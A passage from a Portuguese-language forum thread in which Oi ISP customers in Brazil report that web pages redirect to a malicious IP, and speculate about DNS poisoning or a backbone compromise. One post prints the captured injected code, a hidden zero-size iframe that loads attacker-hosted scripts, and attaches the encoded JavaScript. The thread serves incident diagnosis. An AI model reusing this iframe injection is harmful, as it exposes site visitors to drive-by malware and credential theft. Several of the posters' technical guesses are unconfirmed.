Página 2 de 4 PrimeiroPrimeiro 1234 ÚltimoÚltimo
+ Responder ao Tópico



  1. #21

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Troquei pra o DNS da OI RJ (200.149.55.142 e 200.165.132.148), dei o "ipconfig /flushdns" no prompt, e aparentemente funcionou. No caso, o problema é na Open DNS, que estava aqui?

    O que me pareceu estranho em ser problema externo, é que o site antes carregava, só que rapidamente o código fonte é trocado por um iframe e nesse iframe é que tem esse
    http://66.228.60.253.

    Alguém tem ideia então? Já que se fosse problema externo, era pra se quer carregar algo, já redirecionar direto no server e não na máquina (front).

  2. #22

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por EnnioMartinez Ver Post
    Prezados, Algum roteador do Backbone da OI foi interceptado (Men In The Middle), A OI ja solucionou o problema, sendo que é necessário uma limpeza do cache do navegador.
    Imaginava que minha solução não seria o problema...

    Enfim, pelo menos agora tá resolvido.

    Liguei pra OI e eles nem sabiam explicar o que tava acontecendo. Atendimento lixoso. Pedi pra entrar em contato com o avançado e ninguem queria resolver ou procurar resolver o problema... queriam me forçar a um tal de manutenção remota.



  3. #23

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por EnnioMartinez Ver Post
    Prezados, Algum roteador do Backbone da OI foi interceptado (Men In The Middle), A OI ja solucionou o problema, sendo que é necessário uma limpeza do cache do navegador.
    Quer dizer que nesse tempo de invasão, o que transmitimos foi interceptado? Logins de sites, etc?

  4. #24

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por anderson631 Ver Post
    Quer dizer que nesse tempo de invasão, o que transmitimos foi interceptado? Logins de sites, etc?
    Imagino que não.



  5. #25

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Eles não iriam saber informar mesmo. A equipe de suporte a backbone só empresas grandes conseguem contato.

  6. #26

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Aqui em SC agora esta meio normal alguns sites ainda redirecionam para este site sitado , mais o problema não era de dns , mudei para varios limpava o cache e nada mesma coisa , não sou especialista mais me pareceu uma invação no sistema da OI mesmo , tentei contato mais tambem nao consegui respostas , agora as 22:30Hs a maioria dos sites estão normais , LOUCURA PURAAAAAaaaaaaa



  7. #27

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Anderson631, tudo indica que o roteamento da OI foi alterado, fazendo com que os usuários fossem redirecionados para http://66.228.60.253/x.html, não posso afirmar que as informações foram capturadas, mas eu não descartaria essa possibilidade. Pois redirecionando para um DNS envenenado é possível entregar paginas falsas de banco, por exemplo.

  8. #28
    Under-linux.Org Team Avatar de MarcusMaciel
    Ingresso
    Dec 2000
    Localização
    Boston
    Posts
    1.969
    Posts de Blog
    44

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Alguem enviou esse link mas nao entendi ainda como foi que tudo isso comecou...




  9. #29

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    O problema não foi na Oi, ou ao menos não foi apenas nela.
    Há relatos em sites estrangeiros do mesmo problema acontecendo, como esse: https://www.ponychan.net/oat/res/40288926.html

    De qualquer forma, parece que já foi resolvido e tudo que resta de problema é cache da infecção.

  10. #30

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    tudo indica que o roteamento da OI foi alterado, fazendo com que os usuários fossem redirecionados para http://66.228.60.253/x.html, não posso afirmar que as informações foram capturadas, mas eu não descartaria essa possibilidade. Pois redirecionando para um DNS envenenado é possível entregar paginas falsas de banco, por exemplo.



  11. #31

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Amigo, A OI tem Backbone (internacional), são cabos submarinos da Globenet, subsidiária da Oi. A Globenet possui um duplo anel submarino com 22 mil km de extensão, ligando o Brasil aos EUA, passando pela Venezuela, Colômbia e Bermudas.

  12. #32

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Também estou com esse problema, começou por volta das 20h00.

    Com toda certeza é um ataque hacker, provavelmente ação para roubo de informações bancarias.
    Tenha cuidado com o site que você acessa, evite acessar o site do seu banco até o problema ser resolvido, aparentemente isso já tinha acontecido mês passado(não tão grande quanto dessa vez) e segundo um técnico da lista [caiu] provavelmente eram hackers.

    Pra quem tiver interesse:
    https://eng.registro.br/pipermail/gt...ay/055305.html
    https://eng.registro.br/pipermail/ca...st/044414.html



  13. #33

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Galera, perdoem a minha ignorância. Mas se o ataque é no backbone, trocando o servidor DNS, não era pra assim que digitasse o domínio, retornasse diretamente o conteúdo diferente?

    E pq só existe o redirecionamento, após a página carregar? Inclusive se apertar ESC bem rápido, é possível ver a página original. Ou seja, é como a alteração fosse feita na própria máquina e não na nuvem.

  14. #34

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por anderson631 Ver Post
    Galera, perdoem a minha ignorância. Mas se o ataque é no backbone, trocando o servidor DNS, não era pra assim que digitasse o domínio, retornasse diretamente o conteúdo diferente?

    E pq só existe o redirecionamento, após a página carregar? Inclusive se apertar ESC bem rápido, é possível ver a página original. Ou seja, é como a alteração fosse feita na própria máquina e não na nuvem.
    Agora que você mencionou isso, é verdade... O redirecionamento é feito um pouco depois de você abrir a pagina, estranho.



  15. #35

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por anderson631 Ver Post
    Galera, perdoem a minha ignorância. Mas se o ataque é no backbone, trocando o servidor DNS, não era pra assim que digitasse o domínio, retornasse diretamente o conteúdo diferente?

    E pq só existe o redirecionamento, após a página carregar? Inclusive se apertar ESC bem rápido, é possível ver a página original. Ou seja, é como a alteração fosse feita na própria máquina e não na nuvem.
    Consegui descobrir algo... O DNS alterado "parece" ter sido do endereço do "http://www.google-analytics.com/analytics.js". Logo, 99% dos sites deve tê-lo. E oq retornava era um JS que alterava o conteúdo da página por um iframe, como eu já tinha mencionado.
    Ainda não confirmado se foi totalmente assim.

  16. #36
    Under-linux.Org Team Avatar de MarcusMaciel
    Ingresso
    Dec 2000
    Localização
    Boston
    Posts
    1.969
    Posts de Blog
    44

    Padrão

    Na verdade isso é um java script que ta encoded

    cat x.html
    <iframe style="position: absolute; left: 0px; top: 0px; width: 0px; height: 0px; z-index: 0;" name="analytics" src="http://66.228.60.253/live.php" frameborder="0" width="0" height="0"></iframe><meta charset="utf-8">


    cat live.php
    68281<html> <head> <script src="1.js"> </script> </head><body></body></html>

    eu tambem baixei o 1.js

    e estou colocando em anexo caso alguem esteja curioso
    Arquivos Anexos Arquivos Anexos
    • Tipo de Arquivo: gz 1.js.gz (36,1 KB, 53 visualizações)



  17. #37

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por EnnioMartinez Ver Post
    Amigo, A OI tem Backbone (internacional), são cabos submarinos da Globenet, subsidiária da Oi. A Globenet possui um duplo anel submarino com 22 mil km de extensão, ligando o Brasil aos EUA, passando pela Venezuela, Colômbia e Bermudas.
    Os relatos são em Inglês, provavelmente de usuários na América do Norte, os quais não usam o backbone da GlobeNet para acessar absolutamente coisa alguma.

  18. #38
    Under-linux.Org Team Avatar de MarcusMaciel
    Ingresso
    Dec 2000
    Localização
    Boston
    Posts
    1.969
    Posts de Blog
    44

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por TsouzaR Ver Post
    Os relatos são em Inglês, provavelmente de usuários na América do Norte, os quais não usam o backbone da GlobeNet para acessar absolutamente coisa alguma.
    eu acho que foi algum usuario brasileiro que postou lá querendo saber se mais alguem foi afetado.

    Eu tenho certeza que isso ta acontecendo só com a Oi.



  19. #39

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Aparentemente o site caiu, pelo menos aqui.
    Qualquer pagina não https que eu tente abrir ainda vai redirecionar para o 66.228.60.253, porém a pagina não está mais carregando.

  20. #40

    Padrão Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

    Citação Postado originalmente por MarcusMaciel Ver Post
    eu acho que foi algum usuario brasileiro que postou lá querendo saber se mais alguem foi afetado.

    Eu tenho certeza que isso ta acontecendo só com a Oi.
    É, pode ser isso também.

    Há pouco tempo algum BRAS da Oi foi invadido e estava enviado DNS falso por PPPoE, agora isso.

    A segurança da rede da maior operadora do país é uma maravilha.